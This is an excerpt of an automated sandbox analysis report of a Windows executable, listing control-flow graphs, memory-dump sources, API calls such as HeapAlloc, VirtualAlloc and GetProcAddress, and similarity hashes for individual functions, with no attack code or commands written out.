                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1096550386-0
                                                                                                                                                                                                                                                    • Opcode ID: e6a00ba1b71d7c2ed453bb3e9cfc126ef2c3d2597513af7e414c44b22826226b
                                                                                                                                                                                                                                                    • Instruction ID: b38cf2b47710231129fed3d4deb36c9510e24bdabfa2860622487d1767723f8c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6a00ba1b71d7c2ed453bb3e9cfc126ef2c3d2597513af7e414c44b22826226b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B51A272A00306EFDB319EA4CC85EBB76A9DF84760B15812BFD0CD6151EF74ED10A662

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 130 f6bcd2-f6bce0 131 f6bce6-f6bd1b call f6c033 130->131 132 f6be5c-f6be62 130->132 135 f6bd21-f6bd31 HeapAlloc 131->135 136 f6be5b 131->136 137 f6bd37-f6bd5f call f6c534 call f6c1f4 135->137 138 f6be5a 135->138 136->132 143 f6bd65-f6bd69 137->143 144 f6be4f-f6be54 RtlFreeHeap 137->144 138->136 143->144 145 f6bd6f-f6bd93 call f6beab 143->145 144->138 148 f6be4e 145->148 149 f6bd99-f6bdad call f6beab 145->149 148->144 152 f6bdb3-f6bdc2 149->152 153 f6be4d 149->153 152->153 154 f6bdc8-f6bdd8 HeapAlloc 152->154 153->148 154->153 155 f6bdda-f6be1d call f6d0f0 * 2 HeapAlloc 154->155 155->153 160 f6be1f-f6be4a call f6d0f0 call f6bfeb 155->160 160->153
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00F6C033: HeapAlloc.KERNEL32(?,00000008,00000001,?,00000000), ref: 00F6C069
                                                                                                                                                                                                                                                      • Part of subcall function 00F6C033: _strlen.LIBCMT ref: 00F6C090
                                                                                                                                                                                                                                                      • Part of subcall function 00F6C033: HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 00F6C1E4
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00F6BD27
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,00000015), ref: 00F6BDCE
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00F6BE13
                                                                                                                                                                                                                                                      • Part of subcall function 00F6BFEB: HeapAlloc.KERNEL32(?,00000008,00000010,?,00F6BF7F,?,00F6BC80,00000000), ref: 00F6BFF6
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00F6BE54
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Alloc$Free$_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2043604496-0
                                                                                                                                                                                                                                                    • Opcode ID: 469bdee212de16bb54f7bd191088b98364f72fd53a2808b12f10a2b989b16a8b
                                                                                                                                                                                                                                                    • Instruction ID: 5408d7950252ebb8dcf7bed84794867e7f9a18a71228c029021dfba843397234
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 469bdee212de16bb54f7bd191088b98364f72fd53a2808b12f10a2b989b16a8b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7641EF76908306AFD7209F68CC51FABB7E8EF54314F04881CFA8992242E77AE954DB51

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 165 f6bc80-f6bc91 CreateEventW 166 f6bc93-f6bcb1 WaitForSingleObject call f41000 165->166 167 f6bcce-f6bccf 165->167 170 f6bcc6-f6bccd CloseHandle 166->170 171 f6bcb3-f6bcc3 call f6bfeb 166->171 170->167 171->170
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F6BC87
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F6BC9A
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00F6BCC7
                                                                                                                                                                                                                                                      • Part of subcall function 00F6BFEB: HeapAlloc.KERNEL32(?,00000008,00000010,?,00F6BF7F,?,00F6BC80,00000000), ref: 00F6BFF6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocCloseCreateEventHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 783827187-0
                                                                                                                                                                                                                                                    • Opcode ID: 9f0ff9e50633bc123882804361bd2a63da904bb1087c30115561b5b75e566940
                                                                                                                                                                                                                                                    • Instruction ID: 48eaf4a2a0cf173cc79fb7d679960da572bc2eced5fa567bcad6783899b2844c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f0ff9e50633bc123882804361bd2a63da904bb1087c30115561b5b75e566940
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FE06DB5A016127BD3112B349D09DBB776CFF917113084525FC11E2254DF64DD41E6B1

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00F700DE,?,00F6FFCB,00000000,?,?,00F700DE,E62508BC,?,00F700DE), ref: 00F6FFE5
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00F6FFCB,00000000,?,?,00F700DE,E62508BC,?,00F700DE), ref: 00F6FFEC
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00F6FFFE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: f6dc86ad780ae0148e1362705abcd48661f31a771fa84348b64235bfa3cc9751
                                                                                                                                                                                                                                                    • Instruction ID: 80816ede5c0ff7d72edb2f3240a4c87f437842e87464798fc4d8840c415ea7c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6dc86ad780ae0148e1362705abcd48661f31a771fa84348b64235bfa3cc9751
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9D06C31408158EBCF112F70EC0DAED3F2AAF44365B588021B90D4A021CFBA9996BB96

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 181 f72782-f727aa call f722b9 184 f727b0-f727b6 181->184 185 f7296f-f72970 call f7232a 181->185 187 f727b9-f727bf 184->187 190 f72975-f72977 185->190 188 f727c5-f727d1 187->188 189 f728bb-f728da call f6d670 187->189 188->187 191 f727d3-f727d9 188->191 199 f728dd-f728e2 189->199 193 f72978-f72986 call f6cfb5 190->193 194 f728b3-f728b6 191->194 195 f727df-f727eb IsValidCodePage 191->195 194->193 195->194 198 f727f1-f727f8 195->198 201 f7281a-f72827 GetCPInfo 198->201 202 f727fa-f72806 198->202 203 f728e4-f728e9 199->203 204 f7291f-f72929 199->204 207 f728a7-f728ad 201->207 208 f72829-f72848 call f6d670 201->208 206 f7280a-f72815 202->206 209 f7291c 203->209 210 f728eb-f728f3 203->210 204->199 205 f7292b-f72955 call f7227b 204->205 220 f72956-f72965 205->220 212 f72967-f72968 call f7238d 206->212 207->185 207->194 208->206 222 f7284a-f72851 208->222 209->204 214 f728f5-f728f8 210->214 215 f72914-f7291a 210->215 221 f7296d 212->221 219 f728fa-f72900 214->219 215->203 215->209 219->215 223 f72902-f72912 219->223 220->212 220->220 221->190 224 f72853-f72858 222->224 225 f7287d-f72880 222->225 223->215 223->219 224->225 227 f7285a-f72862 224->227 226 f72885-f7288c 225->226 226->226 228 f7288e-f728a2 call f7227b 226->228 229 f72875-f7287b 227->229 230 f72864-f7286b 227->230 228->206 229->224 229->225 232 f7286c-f72873 230->232 232->229 232->232
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00F722B9: GetOEMCP.KERNEL32(00000000,?,?,?,00F743DB), ref: 00F722E4
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00F725C9,?,00000000,?,?,00F743DB), ref: 00F727E3
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F725C9,?,00000000,?,?,00F743DB), ref: 00F7281F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                                                                                                                    • Opcode ID: f12a0d1f053847ac02a19ba1a7832d3b0d9532afd5becbe5f65ee323189c23f4
                                                                                                                                                                                                                                                    • Instruction ID: 649c4e3e3422dad74e944632fd4a00283d845dadbe252cbfa76f79d85b121f63
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f12a0d1f053847ac02a19ba1a7832d3b0d9532afd5becbe5f65ee323189c23f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82514471E002059EDB60CF76C8806BABBF5FF45310F18C16FD18A8B251E6799945EB93

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 234 f73d41-f73d50 call f73a14 237 f73d52-f73d77 LCMapStringEx 234->237 238 f73d79-f73d93 call f73d9e LCMapStringW 234->238 242 f73d99-f73d9b 237->242 238->242
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNELBASE(?,00F70C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00F73D75
                                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00F70C92,?,?,-00000008,?,00000000), ref: 00F73D93
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2568140703-0
                                                                                                                                                                                                                                                    • Opcode ID: 9c26def9ef6d42a7e5e5b799464056e50fdbcf8a7f3d6629b22114ec5f5091af
                                                                                                                                                                                                                                                    • Instruction ID: 23f78c9ef0be518ecfeb7a351fc429dbbf0710a71a0ca6dd771cc010f3a6b525
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c26def9ef6d42a7e5e5b799464056e50fdbcf8a7f3d6629b22114ec5f5091af
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3F07A3640421EBBCF125FA0DC09DEE3F26EF48360F058111FA1825020C736C931BB91

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 243 f79098-f790ca VirtualAlloc 244 f79270-f79274 243->244 245 f790d0-f790d4 243->245 246 f790dd-f790e4 245->246 247 f790e6-f790ef 246->247 248 f790f1-f790f8 246->248 247->246 250 f790fc-f7910e 248->250 251 f79133-f7913b 250->251 252 f79110-f79116 250->252 253 f7913d-f79143 251->253 254 f7919c-f791a2 251->254 255 f7911d-f79130 252->255 256 f79118 252->256 257 f79145 253->257 258 f7914a-f79167 253->258 259 f791a4 254->259 260 f791a9-f791b0 254->260 255->251 261 f79260-f7926d VirtualFree 256->261 257->261 262 f7916e-f79197 258->262 263 f79169 258->263 259->261 264 f791b7-f791fa 260->264 265 f791b2 260->265 261->244 266 f7925b 262->266 263->261 267 f79203-f79209 264->267 265->261 266->250 267->266 268 f7920b-f79238 267->268 269 f7923c-f79259 268->269 270 f7923a 268->270 269->267 270->266
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F790C1
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F7926D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                    • Instruction ID: b2a029351335262b0ff6c74b01caf4282a44249490952b64361042dbcbf9dfeb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81719F71D0824ADFDB41DF98C981BEDBBF0AF09314F248096E465F7241C274AA51EF65
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F790C1
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F7926D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000003.1602457648.0000000000F79000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00F79000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_3_f79000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                    • Instruction ID: b2a029351335262b0ff6c74b01caf4282a44249490952b64361042dbcbf9dfeb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81719F71D0824ADFDB41DF98C981BEDBBF0AF09314F248096E465F7241C274AA51EF65

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 272 f7238d-f723af 273 f723b5-f723c7 GetCPInfo 272->273 274 f724c1-f724e7 272->274 273->274 276 f723cd-f723d4 273->276 275 f724ec-f724f1 274->275 277 f724f3-f724f9 275->277 278 f724fb-f72501 275->278 279 f723d6-f723e0 276->279 280 f72509-f7250b 277->280 281 f72503-f72506 278->281 282 f7250d 278->282 279->279 283 f723e2-f723f5 279->283 284 f7250f-f72521 280->284 281->280 282->284 285 f72416-f72418 283->285 284->275 288 f72523-f72531 call f6cfb5 284->288 286 f723f7-f723fe 285->286 287 f7241a-f72451 call f7355f call f70d91 285->287 291 f7240d-f7240f 286->291 298 f72456-f72484 call f70d91 287->298 292 f72411-f72414 291->292 293 f72400-f72402 291->293 292->285 293->292 297 f72404-f7240c 293->297 297->291 301 f72486-f72491 298->301 302 f72493-f7249d 301->302 303 f7249f-f724a2 301->303 304 f724b2-f724bd 302->304 305 f724a4-f724ae 303->305 306 f724b0 303->306 304->301 307 f724bf 304->307 305->304 306->304 307->288
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,00F725C9,?), ref: 00F723BF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1807457897-0
                                                                                                                                                                                                                                                    • Opcode ID: a353f9f61850c5a0a1a4ec8a506aacedfee184d13e8a67c42ee60049cc8b3cc1
                                                                                                                                                                                                                                                    • Instruction ID: 00fc5dce1298dd1d66c3da89ba451ceee75e8c3988843e9fdfdae6a1e21cc3af
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a353f9f61850c5a0a1a4ec8a506aacedfee184d13e8a67c42ee60049cc8b3cc1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 815147B1904158ABDB11CF28CC84BE9BBA9FB15310F1481EAE48D87143D3749E85EB62

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 308 f73b13-f73b3d 309 f73b43-f73b45 308->309 310 f73b3f-f73b41 308->310 312 f73b47-f73b49 309->312 313 f73b4b-f73b52 call f73a48 309->313 311 f73b94-f73b97 310->311 312->311 315 f73b57-f73b5b 313->315 316 f73b5d-f73b6b GetProcAddress 315->316 317 f73b7a-f73b91 315->317 316->317 318 f73b6d-f73b78 call f6f7a6 316->318 319 f73b93 317->319 318->319 319->311
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 44654bc2352e0714c8e6e2b72a40ff6b885f39e84e9ad3daf776a415a9f29fbe
                                                                                                                                                                                                                                                    • Instruction ID: ef72554b49ad1f6099df5f81f44f8071baa62f668b056efbb9e305172776feda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44654bc2352e0714c8e6e2b72a40ff6b885f39e84e9ad3daf776a415a9f29fbe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F01F933600228BB9B11CA6CFC80E5673A9E7C57207258126F909C7554EB31D901BB82
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F6CB3E
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00F6CC0A
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6CC2A
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00F6CC34
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
